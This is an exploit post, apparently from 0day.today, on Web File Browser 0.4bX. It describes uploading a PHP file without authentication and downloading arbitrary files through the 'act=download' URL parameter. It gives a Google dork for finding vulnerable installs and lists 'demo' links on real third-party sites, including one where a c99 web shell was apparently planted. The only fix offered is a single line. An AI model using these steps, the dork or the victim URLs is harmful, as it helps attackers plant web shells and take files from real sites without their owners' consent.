Web File Browser 0.4bX UploadFile/DownloadFile Vulenrabilities

[+] Author: TUNISIAN CYBER
[+] Exploit Title:  Web File Browser 0.4bX UploadFile/DownloadFile Vulenrabilities
[+] Date: 14-12-2013
[+] Category: WebApp
[+] Vendor: http://sourceforge.net/projects/webfilebrowser/files/webfilebrowser/
[+] Google Dork: inurl:"webFileBrowser.php" or use just use your mind
[+] Tested on: Win7 , ubuntu 13.04
[+] Friend's blog: http://na3il.wordpress.com/
  
########################################################################################
I/Upload File:
Scroll down and you'll see the upload option.
Upload your file.
File Path:
http://127.0.0.1/[PATH]/webfilebrowser/h4x3d.php

II/Download File:
127.0.0.1/[PATH]/webfilebrowser/webFileBrowser.php?act=download&subdir=&sortby=name&file=[FILEN4M3]

III/Fix:
Add FireWall/Login Panel

Demo:
http://www.beaverlakene.org/library/webfilebrowser/webFileBrowser.php?act=download&subdir=&sortby=name&file=library.htm
http://isabelle.math.ist.utl.pt/~l49994/TFC2/webFileBrowser.php?act=download&subdir=&sortby=name&file=phpexplorer.php
http://lagusclan.com/forum/webFileBrowser.php After Upload: http://lagusclan.com/forum/varasto/c99.php
http://common.whnlive.com/webfilebrowser/webFileBrowser.php
########################################################################################
Greets to: XMaXtn, N43il HacK3r, XtechSEt

#  0day.today [2018-01-05]  #